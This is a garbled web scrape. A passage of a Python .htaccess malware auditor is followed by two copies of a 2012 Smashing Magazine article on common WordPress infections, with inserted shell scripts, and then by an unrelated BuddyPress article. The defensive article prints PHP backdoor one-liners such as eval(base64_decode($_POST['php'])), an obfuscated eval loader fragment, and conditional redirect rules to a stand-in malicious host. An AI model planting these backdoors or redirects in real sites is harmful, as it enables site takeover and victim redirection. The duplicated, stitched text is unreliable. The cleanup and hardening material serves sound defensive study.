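    return findings


def find_htaccess(root):
    """The same list as `find [path] -name .htaccess -type f | sort`."""
    return sorted(os.path.join(d, f) for d, _, fs in os.walk(root) for f in fs if f == ".htaccess")


def audit_tree(root, trusted_hosts):
    """Map each .htaccess (path relative to root) to its findings."""
    report = {}
    for path in find_htaccess(root):
        with open(path, encoding="utf-8", errors="replace") as fh:
            findings = audit_htaccess(fh.read(), trusted_hosts)
        report[os.path.relpath(path, root).replace(os.sep, "/")] = findings
    return report


def replicated(report):
    """Groups of files carrying the identical set of flagged lines: the
    'same infection copied into every directory' pattern described above."""
    groups = {}
    for path, findings in report.items():
        key = tuple(f[3] for f in findings)
        if key:
            groups.setdefault(key, []).append(path)
    return [sorted(paths) for paths in groups.values() if len(paths) > 1]


WP_RULES = """# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""
# Constructed malicious tail: a redirect conditioned on browser and referrer,
# plus an error directive pointing at the same off-site script, which is why
# the text says to scroll to the bottom of the file.
BAD_TAIL = """RewriteCond %{HTTP_USER_AGENT} (msie|firefox|chrome) [NC]
RewriteCond %{HTTP_REFERER} (google|bing|yahoo) [NC]
RewriteRule .* http://meansite.example/stats.php [R=301,L]
ErrorDocument 404 http://meansite.example/stats.php
"""


def build_sample_tree():
    """Constructed tree: infected root .htaccess, a replicated copy in
    uploads, and a benign one in wp-includes.  Returns the root path."""
    root = tempfile.mkdtemp(prefix="wp-htaccess-")
    files = {
        ".htaccess": WP_RULES + BAD_TAIL,
        "wp-content/uploads/.htaccess": BAD_TAIL,
        "wp-includes/.htaccess": "Options -Indexes\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    rep = audit_tree(build_sample_tree(), {"myhappysite.example"})
    for path, findings in rep.items():
        for n, directive, reason, line in findings:
            print(f"{path}:{n}: {directive}: {reason}: {line}")
    print("replicated:", replicated(rep))
```

Pass your own domain(s) as trusted_hosts so that legitimate Redirect rules to your own site are not flagged. A RewriteCond on the user agent is not malicious by itself, so it is reported as something to review rather than delete; the off-site targets and the replicated groups are the lines to act on first.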

How do I prevent it?

A quick and easy method is to change ownership of the file, or to reduce the file’s permissions so that only the owner has permission to modify it. However, if your root account is compromised, that won’t do you much good.

The most important file to take care of is .htaccess. Check out the tutorial “Protect Your WordPress Site with .htaccess” for tips on doing that.

Conclusion

There you have it: four prevalent attacks that cause havoc across many WordPress installations today. You might not feel better if you get hacked, but hopefully, with this bit of knowledge, you’ll feel more confident that the hack can be cleaned and that your website can be returned to you. Most importantly, if you take one thing away from this: always keep WordPress updated.

Tony’s Top Ten Security Tips

  1. Get rid of generic accounts, and know who is accessing your environment.
  2. Harden your directories so that attackers can’t use them against you. Kill PHP execution.
  3. Keep a backup; you never know when you’ll need it.
  4. Connect securely to your server. SFTP and SSH are preferred.
  5. Avoid soup-kitchen servers. Segment between development, staging and production.
  6. Stay current with your software — all of it.
  7. Kill unnecessary credentials, including for FTP, wp-admin and SSH.
  8. You don’t need to write posts as an administrator, nor does everyone need to be an administrator.
  9. If you don’t know what you’re doing, leverage a managed WordPress hosting provider.
  10. IP filtering + Two-factor authentication + Strong credentials = Secure access

Tony’s Most Useful Security Plugins

  • Sucuri Sitecheck Malware Scanner
    This plugin from Tony and the Sucuri crew enables full malware and blacklist scanning in your WordPress dashboard, and it includes a powerful Web application firewall (WAF).
  • Login Lock
    This enforces strong password policies, locks down log-ins, monitors log-ins, blocks hacker IPs and logs out idle users.
  • Two-Factor Authentication
    This plugin enables Duo’s two-factor authentication, using a service such as a phone callback or SMS message.
  • Theme-Check
    Test your theme to make sure it’s up to spec with theme review standards.
  • Plugin-Check
    Does what Theme-Check does but for plugins.



© Siobhan McKeown for Smashing Magazine, 2012.


Security: Common WordPress Malware Infections


  

WordPress security is serious business. Exploits of vulnerabilities in WordPress’ architecture have led to mass compromises of servers through cross-site contamination. WordPress’ extensibility increases its vulnerability; plugins and themes house flawed logic, loopholes, Easter eggs, backdoors and a slew of other issues. Firing up your computer to find that you’re supporting a random cause or selling Viagra can be devastating.

WordPress Security

In WordPress’ core, all security issues are quickly addressed; the WordPress team is focused on strictly maintaining the integrity of the application. The same, however, cannot be said for all plugins and themes.

The focus of this post is not to add to the overwhelming number of WordPress security or WordPress hardening posts that you see floating around the Web. Rather, we’ll provide more context about the things you need to protect yourself from. What hacks are WordPress users particularly vulnerable to? How do they get in? What do they do to a WordPress website? In this lengthy article, we’ll cover backdoors, drive-by downloads, pharma hack and malicious redirects. Please notice that some anti-virus apps report this article as malware, probably because it contains examples of the code that should be avoided. This article does not contain any malware itself, so the alert must be based on heuristic analysis.

Over the past two years, Web malware has grown around 140%. At the same time, WordPress has exploded in popularity as a blogging platform and CMS, powering close to 17% of websites today. But that popularity comes at a price; it makes WordPress a target for Web-based malware. Why? Simple: its reach provides the opportunity for maximum impact. Sure, popularity is a good thing, but it also makes us WordPress users vulnerable.

A Bit About Our Security Expert: Meet Tony

Lacking the technical knowledge needed to go into great depth, I brought on board a co-author to help me out. Bringing the technical information is Tony Perez, Chief Operations and Financial Officer of Sucuri Security. Sucuri Security provides detection, alerting and remediation services to combat Web-based malware. In other words, it works on websites that have been compromised. This means that Tony has the background, statistics and, most importantly, knowledge to go really in depth on malware issues that affect WordPress users.

I asked Tony how he got into Web security:

Tony

“I think it goes back to 2009. I was managing and architecting large-scale enterprise solutions for Department of Defense (DoD) clients and traveling the world. In the process, there was a little thing called compliance with the Security Technical Implementation Guide (STIG), set forth by the Defense Information Systems Agency (DISA). I know, a mouthful, but it’s how we did things in the DoD; if it didn’t have an acronym, it didn’t belong.

That being said, it wasn’t until I joined Dre and Daniel at Sucuri Security, in early 2011, that I really began to get what I consider to be any resemblance of InfoSec chops.”

Armed with Tony’s technical knowledge, we’ll look at the main issues that affect WordPress users today. But before we get into details, let’s look at some of the reasons why WordPress users might be vulnerable.

What Makes WordPress Vulnerable?

Here’s the simple answer. Old versions of WordPress, along with theme and plugin vulnerabilities, multiplied by the CMS’ popularity, with the end user thrown into the mix, make for a vulnerable website.

Let’s break that down.

The first issue is outdated versions of WordPress. Whenever a new WordPress version is released, users get a nagging message, but plenty of users have gotten pretty good at ignoring the nag. Core vulnerabilities in themselves are rarely an issue. They do exist; proof can be found in the most recent 3.3.3 and 3.4.1 releases. WordPress’ core team has gotten pretty good at rolling out security patches quickly and efficiently, so the risk of exploitation is minimal, provided that WordPress users update their installation. This, unfortunately, is the crux of the problem: WordPress users ignore the message. And it’s not just inexperienced and casual WordPress users who aren’t updating. A recent high-profile hack was of the Reuters website, which was running version 3.1.1 instead of the current 3.4.1.

Vulnerabilities in plugins and themes is another issue. The WordPress repository has 20,000 plugins and is growing. The plugins are of varying quality; some of them inevitably have security loopholes, while others are outdated. On top of that, consider all of the themes and plugins outside of the repository, including commercial products that are distributed for free on Warez websites and come packed with malware. Google is our favorite search engine, but it’s not so hot for finding quality WordPress themes.

Then, there’s popularity. WordPress is popular, without a doubt. Around 700 million websites were recorded as using WordPress in May of this year. This popularity means that if a hacker can find a way into one WordPress website, they have potentially millions of websites for a playground. They don’t need to hack websites that use the current version of WordPress; they can scan for websites that use old insecure versions and hack those.

Finally and most significantly, the biggest obstacle facing WordPress users is themselves. Tony in his own words:

“For whatever reason, there is this perception among WordPress users that the hardest part of the job was paying someone to build the website and that once its built, that’s it, it’s done, no further action required. Maybe that was the case seven years ago, but not today.

WordPress’ ease of use is awesome, but I think it provides a false sense of assurances to end users and developers alike. I think, though, this perception is starting to change.”

From Tony’s experience at Sucuri Security, the most common vulnerabilities to website exploits are:

  • Out of date software,
  • Poor credential management,
  • Poor system administration,
  • Soup-kitchen servers,
  • Lack of Web knowledge,
  • Corner-cutting.

A bit of time and education are all it takes to remedy these issues and to keep your WordPress website secure. This means not just ensuring that you as a WordPress expert are educated, but ensuring that the clients you hand over websites to are as well.

The Evolution Of Attacks

As the Internet has evolved, the nature of hacking has evolved with it. Hacking started out as a very different animal. Back in the day, it was about showing your technical prowess by manipulating a website to do things beyond the webmaster’s intentions; this was often politically motivated. One day you’d wake up and find yourself supporting the opposition in Nigeria or Liberia. These days, hacking is all about money. The recent DNSChanger malware (i.e. the “Internet Doomsday� attack), for example, let hackers rake in close to $14 million before being stopped by the FBI and Estonian police last November.

Another hacking technology that has emerged is malnets. These distributed malware networks are used for everything including identify theft, DDoS attacks, spam distribution, drive-by downloads, fake AV and so on. The hackers automate their attacks for maximum exposure.

Automation through the use of bots is not their only mechanism. Today you also have malware automation: the use of tools to quickly generate a payload (i.e. the infection), allowing the attacker to focus strictly on gaining access to the environment. Once the hacker has access to the environment, they copy and paste in the auto-generated payload. One of the more prevalent automation tools is the Blackhole Exploit Kit. This and many other kits can be purchased online for a nominal fee. That fee buys sustainment services and keeps the kit updated with new tools for the latest vulnerabilities. It’s a true enterprise.

Common WordPress Malware Issues

Thousands of malware types and infections are active on the Internet; fortunately, not all apply to WordPress. For the rest of this post, we’ll look at four of the most common attacks on WordPress users:

Backdoor

A backdoor lets an attacker gain access to your environment via what you would consider to be abnormal methods — FTP, SFTP, WP-ADMIN, etc. Hackers can access your website using the command line or even using a Web-based GUI like this:

backdoor gui screenshot
A backdoor GUI. Click the image for the whole picture!

Backdoors are exceptionally dangerous. Left unchecked, the most dangerous can cause havoc on your server. They are often attributed to cross-site contamination incidents — i.e. when websites infect other websites on the same server.

How am I attacked?

The attack often happens because of out-of-date software or security holes in code. A vulnerability well known to the WordPress community was found in the TimThumb script that was used for image resizing. This vulnerability made it possible for hackers to upload a payload that functioned as a backdoor.

Here is an example of a scanner looking specifically for vulnerable versions of TimThumb:

Screenshot

What does it look like?

Like most infections, this one can be encoded, encrypted, concatenated or some combination thereof. However, it’s not always as simple as looking for encrypted code; there are several instances in which it looks like legitimate code. Here is an example:

Screenshot

Another example:

Screenshot

Below is a case where the content is hidden in the database and targets WordPress installations:

return @eval(get_option(\’blogopt1\’));

And here is a very simple backdoor that allows any PHP request to execute:

eval (base64_decode($_POST["php"]));

Here is an example of a messy backdoor specifically targeting the TimThumb vulnerability:

Screenshot

Here is another backdoor that commonly affects WordPress installations, the Filesman:

Screenshot

How can I tell whether I’m infected?

Backdoors come in all different sizes. In some cases, a backdoor is as simple as a file name being changed, like this:

  • wtf.php
  • wphap.php
  • php5.php
  • data.php
  • 1.php
  • p.php

In other cases, the code is embedded in a seemingly benign file. For instance, this was found in a theme’s index.php file, embedded in legitimate code:

Screenshot

Backdoors are tricky. They constantly evolve, so there is no definitive way to say what you should look for.

How do I prevent it?

While backdoors are difficult to detect, preventing them is possible. For the hack to be effective, your website needs an entry point that is accessible to the hacker. You can close backdoors by doing the following:

  1. Prevent access.
    Make your environment difficult to access. Tony recommends a three-pronged approach to locking down wp-admin:

    • Block IPs,
    • Two-factor authentication,
    • Limited access by default.

    This will make it extremely difficult for anyone except you to access your website.

  2. Kill PHP execution.
    Often the weakest link in any WordPress chain is the /uploads/ directory. It is the only directory that needs to be writable in your installation. You can make it more secure by preventing anyone from executing PHP. It’s simple to do. Add the following to the .htaccess file at the root of the /uploads/ directory. If the file doesn’t exist, create it.
# Refuse direct requests for any file whose name ends in .php (Apache 2.2 access-control syntax)
<FilesMatch "\.php$">
Order Deny,Allow
Deny from All
</FilesMatch>

How is it cleaned?

Once you have found a backdoor, cleaning it is pretty easy — just delete the file or code. However, finding the file can be difficult. On his blog, Canton Becker provides some advice on ways to scour your server for backdoors. There is no silver bullet for backdoors, though, or for any infection — backdoors can be simple or complex. You can try doing some basic searches for eval and base64_decode, but if your code looks like what’s below, then knowing what to look for becomes more difficult:

$XKsyG='as';$RqoaUO='e';$ygDOEJ=$XZKsyG.'s'.$RqoaUO.'r'.'t';$joEDdb='b'.$XZKsyG.
$RqoaUO.(64).'_'.'d'.$RqoaUO.'c'.'o'.'d'.$RqoaUO;@$ygDOEJ(@$joEDdb('ZXZhbChiYXN
lNjRfZGVjb2RlKCJhV1lvYVhOelpY…

If you are familiar with the terminal, you could log into your website using SSH and try certain methods. The most obvious and easiest method is to look for this:

# grep -ri "eval" [path]

Or for this:

# grep -ri "base64_decode" [path]

The -r option ensures that all files in all subdirectories are scanned, while -i makes the match case-insensitive. This is important because you could find variations of eval: Eval, eVal, evAl, evaL or any other permutation. The last thing you want is for your scan to fall short because you were too specific.

Look for recently modified files:

find . -type f -ctime -1 | more

The -type f option restricts the search to regular files, and -ctime -1 restricts it to files whose status changed within the last 24 hours. You can look at the last 24 or 48 hours by specifying -1 or -2, respectively.

Another option is to use the diff command. This enables you to detect the differences between files and directories. In this case, you would use it for directories. For it to be successful, though, you need to have clean copies of your installation and themes. So, this works only if you have a complete backup of your website.

# diff -r /[path]/[directory] /[path]/[directory] | sort

The -r option is recursive through all directories, and the sort command sorts the output and makes it easier to read. The key here is to quickly identify the things that don’t belong so that you can run integrity checks. Anything you find that is in the live website’s directory but not in the backup directory warrants a second look.
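The three checks just described (case-insensitive grep for eval and base64_decode, recently changed files, diff against a clean copy) combined into one triage script. This is an added example, not code from the article or from Sucuri; the function names, paths and sample files are assumptions.

```shell
#!/bin/sh
# Added example (not from the article): a small backdoor triage script that
# automates the three checks described above. Every hit is a lead to inspect,
# not proof of compromise: plenty of legitimate plugins call base64_decode too,
# and a concatenated sample like the one shown earlier will slip past the grep.

# Print files under $1 that call eval( or base64_decode( in any letter case.
# -r recurses, -i ignores case, -l prints only file names, -E enables the
# alternation. Whitespace before the parenthesis is allowed, as in "eval (".
suspicious_files() {
    grep -rilE '(eval|base64_decode)[[:space:]]*\(' "$1" 2>/dev/null | sort
}

# Print files under $1 whose content or metadata changed within the last $2
# days (default 1, i.e. the last 24 hours). -ctime -1 means "less than a day ago".
recently_changed() {
    find "$1" -type f -ctime "-${2:-1}" | sort
}

# Compare the live tree $1 against a known-clean copy $2. diff -rq prints
# "Only in <dir>: <name>" for files present on one side only and
# "Files ... differ" for modified ones; names only in the live tree come first
# on the inspection list.
compare_with_backup() {
    diff -rq "$2" "$1" | sort
}

# Run all three checks for the site at $1; $2 is the clean backup (may be
# empty to skip the comparison).
triage_report() {
    echo "== files calling eval/base64_decode =="
    suspicious_files "$1"
    echo "== files changed in the last 24h =="
    recently_changed "$1" 1
    if [ -n "$2" ]; then
        echo "== differences from clean backup =="
        compare_with_backup "$1" "$2"
    fi
}
```

Run it as `triage_report /var/www/site /srv/backups/site-clean` (assumed paths) and review every line it prints before deleting anything.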

Drive-By Downloads

A drive-by download is the Web equivalent of a drive-by shooting. Technically, it is usually embedded on your website via some type of script injection, which could be associated with a link injection.

The point of a drive-by download is often to download a payload onto your user’s local machine. One of the most common payloads informs the user that their website has been infected and that they need to install an anti-virus product, as shown here:

How does the attack get in?

There are a number of ways an attack can get in. The most common causes are:

  • Out of date software,
  • Compromised credentials (wp-admin, FTP),
  • SQL injection.

What does it look like?

Below are a number of examples of link injections that lead to some type of drive-by download attack:

Screenshot

And this:

Screenshot

And this:

Screenshot

More recently, drive-by downloads and other malware have been functioning as conditional malware — designed with rules that have to be met before the infection presents itself. You can find more information about how conditional malware works in Sucuri’s blog post “Understanding Conditional Malware.”

How can I tell whether I’m infected?

Using a scanner such as SiteCheck to see whether you are infected is possible. Scanners are pretty good at picking up link injections. Another recommendation is to sign up for Google Webmaster Tools and verify your website. In the event that Google is about to blacklist your website, it would email you beforehand notifying you of the problem and giving you a chance to fix it. The free service could pay dividends if you’re looking to stay proactive.

Outside of using a scanner, the difficulty in identifying an infection will depend on its complexity. When you look on the server, it will look something like this:

Screenshot

The good news is that such an infection has to be somewhere where an external output is generated. The following files are common places where you’ll find link injections:

  • wp-blog-header.php (core file)
  • index.php (core file)
  • index.php (theme file)
  • functions.php (theme file)
  • header.php (theme file)
  • footer.php (theme file)

About 6 times out of 10, the infection will be in one of those files. Also, your anti-virus software might detect a payload being dropped onto your computer when you visit your website — another good reason to run anti-virus software locally.

Sucuri has also found link injections embedded in posts and pages (as opposed to an originating PHP file), as well as in text widgets. In such cases, scrub your database and users to ensure that none of your accounts have been compromised.

How is it cleaned?

Cleaning can be a challenge and will depend on your technical skill. You could use the terminal to find the issue.

If you have access to your server via SSH, you’re in luck. If you don’t, you can always download locally. Here are the commands that will be of most use to you when traversing the terminal:

  • CURL
    Used to transfer data with a URL syntax.
  • FIND
    Search by file or directory name.
  • GREP
    Search for content in files.

For example, to search all of your files for a particular section of the injection, try something like this:

$ grep -r "http://objectcash.in" .

Including the following characters is important:

  • "
    Maintains the integrity of the search. Using it is important when you’re searching for special characters because some characters have a different meaning in the terminal.
  • -r
    Means “recursive” and will traverse all directories and files.

You can also refine your search by file type:

$ grep --include "*.php" -r "http://objectcash.in" .

Enabling the --include option allows you to specify file type; in this instance, only PHP files.

These are just a few tricks. Once you’ve located the infection, you have to ensure that you remove every instance of it. Leaving just one could lead to serious frustration in the future.

Pharma Hack

Pharma hack is one of the most prevalent infections around. It should not be confused with malware; it’s actually categorized as SPAM — “stupid pointless annoying messages.” If you’re found to be distributing SPAM, you run the risk of being flagged by Google with the following alert:

This site may be compromised!!

This is what it will look like on Google’s search engine results page (SERP):

How am I attacked?

The pharma SPAM injection makes use of conditional malware that applies rules to what the user sees. So, you may or may not see the page above, depending on various rules. This is controlled via code on the server, such as the following:

Screenshot

Some injections are intelligent enough to create their own nests within your server. The infection makes use of $_SERVER["HTTP_REFERER"], which redirects the user to an online store that is controlled by the attacker to generate revenue. Here is an example of such a monetized attack:

Screenshot

Like most SPAM-type infections, pharma hack is largely about controlling traffic and making money. Money can be made through click-throughs and/or traffic. Very rarely does a pharma hack injection redirect a user to a malicious website that contains some additional infection, as with a drive-by download attempt.

This is why it’s so difficult to detect. It’s not as simple as querying for “Cialis” or “Viagra,” although that’d be awesome. Most people would be surprised by the number of legitimate pharmaceutical companies that exist and publish ads on the Web. This adds to the challenge of detecting these infections.

What does it look like?

Pharma hack has evolved, which has made it more difficult to detect. In the past, SPAM injections would appear in your pages, where they were easy to find and, more importantly, remove.

Today, however, pharma hack is quite different. It uses a series of backdoors, sprinkled with intelligence, to detect where traffic is coming from, and then it tells the infection how to respond. Again, it can behave as conditional malware. More and more, pharma hack reserves its payload for Google’s bots; the goal is to make it onto Google’s SERPs. This provides maximum exposure and the biggest monetary return for the hackers.

Here’s an image of an old pharma hack injecting SPAM into a blog’s tags:

screenshot of a blog's tags with pharma hack tags

Another version of pharma hack was injected in such a way that when the user clicks on an apparently benign link (such as “Home,” “About” or “Contact”), it redirects the user to a completely different page. Somewhere like this:

How do I tell whether I’m infected?

Identifying an infection can be very tricky. In earlier permutations, identifying an infection was as easy as navigating your website, looking at your ads, links, posts and pages, and quickly determining whether you’ve been infected. Today, there are more advanced versions that are harder to find.

The good news for diligent webmasters is that by enabling some type of auditing or file monitoring on your WordPress website, you’ll be able to see when new files have been added or when changes have been made. This is by far one of the most effective methods of detection.

You could try using free scanners, such as SiteCheck. Unfortunately, many HTTP scanners, including Sucuri’s, struggle with the task because pharma hack is not technically malicious, so determining the validity of content can be difficult for a scanner.

How is it cleaned?

First, identify the infected files, and then remove them. You can use the commands we’ve outlined above, and you can make queries to your website via the terminal to quickly see whether you’re serving any pharma SPAM to your visitors.

When combatting pharma hacks, one of the most useful commands is grep. For example, to search for any of the ads or pharma references being flagged, run this:

# egrep -wr 'viagra|pharmacy' .

By using egrep, we’re able to search multiple words at the same time if necessary, thus saving you time in this instance.

Or try something like this:

# grep -r "http://canadapharmacy.com" .

This only works if the infection is not encoded, encrypted or concatenated.

Another useful method is to access your website via different user agents and referrers. Here is an example of what one website looked like when using a Microsoft IE 6 referrer:

Try Bots vs Browsers to check your website through a number of different browsers.

Terminal users can also use CURL:

# curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" http://somesite.com

How do I prevent it?

Preventing a pharma hack can be tricky. Sucuri has found that the hack regularly exploits vulnerable out-of-date software. However, your out-of-date WordPress installation is not necessarily the problem. Even if you are up to date, another outdated installation on the same server could be vulnerable to the infection. If the real payload resides elsewhere on your server, not within your website’s directory, then catching it can be exceptionally difficult.

Here is an example of what you might be looking for if you can’t find the infection in your own installation:

Screenshot

To prevent a pharma hack, you should do two things:

  1. Keep your software up to date,
  2. Steer clear of soup-kitchen servers.

Malicious Redirects

A malicious redirect sends a user to a malicious website. In 2010, 42,926 new malicious domains were detected. In 2011, this number grew to 55,294. And that just includes primary domains, not all of their subdomains.

When a visitor is redirected to a website other than the main one, the website may or may not contain a malicious payload. Suppose you have a website at myhappysite.com; when someone visits it, the website could take the visitor to meansite.com/stats.php, where the malicious payload is in that website’s stats.php file. Or it could be a harmless website with just ads and no malicious payload.

How am I attacked?

As with many malware attacks, it comes down to access. The malicious redirect could be generated by a backdoor. The hacker would scan for a vulnerability, such as TimThumb or old versions of WordPress and, when they find it, upload a payload that functions as a backdoor.

What does it look like?

Detecting a redirect is not as complex as detecting some of the other infections. It is often found in your .htaccess file and looks something like this:

Screenshot

Or like this:

Screenshot

There may be instances where a redirect is encoded and resides in one of your PHP files. If so, it will usually be found in your header.php, footer.php or index.php file; it has also been known to reside in the root index.php file and in other core template files. It is not always encoded, but if it is, it will look something like this:

Screenshot

How do I tell if I am infected?

There are a few ways to check for infections. Here are some suggestions:

  • Use a free scanner, such as SiteCheck. They very rarely miss malicious redirects.
  • Test using Bots vs Browsers.
  • Listen to your users. You might not detect the redirect, but sometimes a user will alert you to it.

If a user does detect a problem, ask them pertinent questions to help diagnose the problem:

  • What operating system are they using?
  • What browser(s) are they using, and which version(s)?

The more information you get from them, the better you can replicate the issue and find a fix.

How is it cleaned?

Malicious redirects are one of the easiest infections to clean. Here’s a good starting point:

  1. Open your .htaccess file.
  2. Copy any rewrite rules that you have added yourself.
  3. Identify any malicious code, like the sample above, and remove it from the file. Scroll all the way to the bottom of .htaccess to make sure there aren’t any error directives pointing to the same infection.

Be sure to also look for all .htaccess files on the server. Here is one quick way to see how many exist on your server:

# find [path] -name .htaccess -type f | wc -l

And this will tell you where exactly those files are:

# find [path] -name .htaccess -type f | sort

The infection is not always restricted there, though. Depending on the infection, you might also find the redirect encoded and embedded in a file such as index.php or header.php.

Alarmingly, these infections can replicate across all of your .htaccess files. The backdoor responsible for it can also be used to create multiple .htaccess files across all of your directories, all with the same infection. Removing the infection can feel like an uphill struggle, and sometimes cleaning every file you can find is not enough. There are even cases where a file is created outside of the Web directory. The lesson: always look outside of your Web directory as well as within it.
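The .htaccess sweep from the two find commands above, extended to flag redirect and error directives whose target sits on a foreign host. This is an added example, not from the article; the directive names are standard Apache ones, and the own-domain argument is an assumption you replace with your site’s domain.

```shell
#!/bin/sh
# Added example, not from the article: enumerate every .htaccess file below a
# web root and flag lines that send visitors to a host other than your own.
# Directive names are the standard Apache ones (mod_alias Redirect*,
# mod_rewrite RewriteRule, core ErrorDocument). The own-domain argument is an
# assumption you set to your site's domain.

# List every .htaccess file below $1, sorted, one path per line.
list_htaccess() {
    find "$1" -name .htaccess -type f | sort
}

# How many there are. A plain WordPress install usually has one at the root
# and perhaps one in wp-content/uploads; many more deserves a look.
count_htaccess() {
    list_htaccess "$1" | wc -l | tr -d ' '
}

# Print "file:line:directive" for Redirect/RedirectMatch/RewriteRule/
# ErrorDocument lines whose target is an absolute http(s) URL on a host other
# than $2. Directive names match case-insensitively, as Apache treats them.
# An encoded redirect inside index.php or header.php is outside this check.
flag_external_redirects() {
    root="$1"
    own=$(printf '%s' "$2" | sed 's/\./\\./g')   # escape dots for the regex
    list_htaccess "$root" | while IFS= read -r f; do
        grep -niE '^[[:space:]]*(Redirect(Match|Permanent|Temp)?|RewriteRule|ErrorDocument)[[:space:]]' "$f" \
            | grep -iE 'https?://' \
            | grep -ivE "https?://([a-z0-9.-]*\.)?${own}([/:[:space:]]|$)" \
            | sed "s|^|$f:|"
    done
}
```

Run `flag_external_redirects /var/www/site myhappysite.com` (assumed path and domain) and inspect each reported line; remember the article’s warning that copies may also live outside the Web directory.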

How do I prevent it?

A quick and easy method is to change ownership of the file, or to reduce the file’s permissions so that only the owner has permission to modify it. However, if your root account is compromised, that won’t do you much good.

The most important file to take care of is .htaccess. Check out the tutorial “Protect Your WordPress Site with .htaccess” for tips on doing that.

Conclusion

There you have it: four prevalent attacks that cause havoc across many WordPress installations today. You might not feel better if you get hacked, but hopefully, with this bit of knowledge, you’ll feel more confident that the hack can be cleaned and that your website can be returned to you. Most importantly, if you take one thing away from this: always keep WordPress updated.

Tony’s Top Ten Security Tips

  1. Get rid of generic accounts, and know who is accessing your environment.
  2. Harden your directories so that attackers can’t use them against you. Kill PHP execution.
  3. Keep a backup; you never know when you’ll need it.
  4. Connect securely to your server. SFTP and SSH are preferred.
  5. Avoid soup-kitchen servers. Segment between development, staging and production.
  6. Stay current with your software — all of it.
  7. Kill unnecessary credentials, including for FTP, wp-admin and SSH.
  8. You don’t need to write posts as an administrator, nor does everyone need to be an administrator.
  9. If you don’t know what you’re doing, leverage a managed WordPress hosting provider.
  10. IP filtering + Two-factor authentication + Strong credentials = Secure access

Tony’s Most Useful Security Plugins

  • Sucuri Sitecheck Malware Scanner
    This plugin from Tony and the Sucuri crew enables full malware and blacklist scanning in your WordPress dashboard, and it includes a powerful Web application firewall (WAF).
  • Login Lock
    This enforces strong password policies, locks down log-ins, monitors log-ins, blocks hacker IPs and logs out idle users.
  • Two-Factor Authentication
    This plugin enables Duo’s two-factor authentication, using a service such as a phone callback or SMS message.
  • Theme-Check
    Test your theme to make sure it’s up to spec with theme review standards.
  • Plugin-Check
    Does what Theme-Check does but for plugins.



© Siobhan McKeown for Smashing Magazine, 2012.


BuddyPress: One Plugin, Five Communities // WordPress


  

BuddyPress is social networking in a box, the loveable plugin that has people around the world getting social. But using BuddyPress isn’t all about waking up one morning and being struck by the amazing idea of creating the next Facebook. BuddyPress is a tool for creating communities. In fact, if you look at successful implementations of BuddyPress, you’ll see they aren’t Facebook clones, but rather niche groups that have put BuddyPress to work in growing their community. The 1.7 release should make BuddyPress compatible with any WordPress theme, making it even more accessible to potential community builders.

BuddyPress

But people are already doing it successfully. In this article, we’ll look at some of them — five communities that are using BuddyPress, some big, some small, some established, some emerging, some successful and some unsuccessful.

The University: CUNY Academic Commons

a screenshot of the Rockhaq homepage.

Current membership: 3,100

The CUNY Academic Commons is an academic network of graduate students, staff, faculty and administrators across the 24 campuses of the City University of New York. It has two main aims: first, to foster connections between members of CUNY. As a community with 24 campuses across New York City, CUNY is highly distributed. Members might share interests with people who are only a few miles from each other yet never have occasion to meet. Secondly, CUNY aims to “provide a space where members can do work, as individuals or collaboratively, in a way that is flexible, powerful, and visible to a larger public.”

Who Is Behind It?

The Commons was conceived and created by CUNY faculty members. The project director is Matthew K. Gold, a professor of English at NYC College of Technology and CUNY Graduate Center. A committee comprising faculty and staff from across CUNY is responsible for overseeing the website’s strategy and policies.

The development and community teams are responsible for the day-to-day technical maintenance and community building around the website. They are made up of around 10 people, most of whom are CUNY faculty or students. The development team takes care of maintaining the website and fixing bugs. They are all active members of the WordPress community. Boone Gorges is on the core BuddyPress team, and the CUNY Academic Commons has sponsored the development of many public-facing plugins.

Besides the development team, the community facilitators handle the non-technical aspects of community management. They’re responsible for website support and documentation. The community facilitators are the people who foster connections across the website, monitor the network’s activity and write round-up posts. The key to success for the Commons has been the active community team. As developer Boone Gorges says, “No matter how good the tools are, communities don’t form themselves; our facilitators keep up the energy and activity levels on the site, moving the community forward.”

Why BuddyPress?

The Commons was inspired by work done by Jim Groom and his team at the University of Mary Washington (UMW) on the UMW Blogs platform, which is built on WordPress. CUNY is a public university, and thus the team felt that using and supporting free software was important. As it was building the Commons, BuddyPress was nearing its 1.0 release. It was also the only real social-networking plugin for WordPress.

The Commons is a community of academics focused on collaborative work and, as such, has needed a large number of customizations to enable collaborative writing and discussion. It worked to the team’s advantage that BuddyPress was conceptualized from the start as a platform for further development, taking advantage of WordPress’ rich plugin architecture. Had the team used a proprietary platform or even an open-source alternative, it never would have been able to make the improvements it did, such as optimizations to the group forums, the creation of collaborative editing spaces, better filtering of member directories, and support for full email notifications of new activity. BuddyPress’ freedom and flexibility enabled the team to create a platform geared to the needs of its community.

How the Commons Works

The Commons is intended to be a flexible and open space for collaboration. Users can create groups, blogs or wiki pages (or even all three). Membership is restricted to individuals with a cuny.edu email address, which means they haven’t had any issues requiring moderation.

Boone outlines some typical use cases:

  • Interest groups
    Individuals who share a common interest — Spanish language, poetry, games and education, bicycle culture in New York City — may use the group’s infrastructure for conversation and collaboration.
  • Conferences and events
    When a CUNY school is to host an academic conference, a Commons blog may be used to publicize the event, and a group might be established to foster communication about the event.
  • Graduate courses
    Classes held on the Commons use blogs for public-facing writing and use groups for their private discussion forums and other collaborative features.
  • Committee work
    When an administrative committee needs a place to share documents and engage in ongoing discussion about its work, it often turns to Commons groups.
  • Academic journal publications
    Several academic journals have recently found a home on the Commons. For a given journal, a WordPress blog is used for publication, while a private group is used for planning and review.
  • Academic departments
    Several academic departments use Commons groups as a replacement for listservs. They share news and documents with each other and have discussions in the forums.

CUNY Member Profile
Every CUNY member has their own profile.

The Commons’ current theme is a child theme of BuddyPress’ default theme. Recently, the Commons was awarded a grant from the Alfred P. Sloan Foundation to develop the Commons in a Box software package, which will include some of CUNY’s more popular customizations. An important aspect of this will be the default theme, which will be built with the Infinity Theming Engine (by Infinity’s developers, Marshall Sorenson and Bowe Frankema). Later this year, the Commons will have its own theme converted to use the Commons in a Box theme.

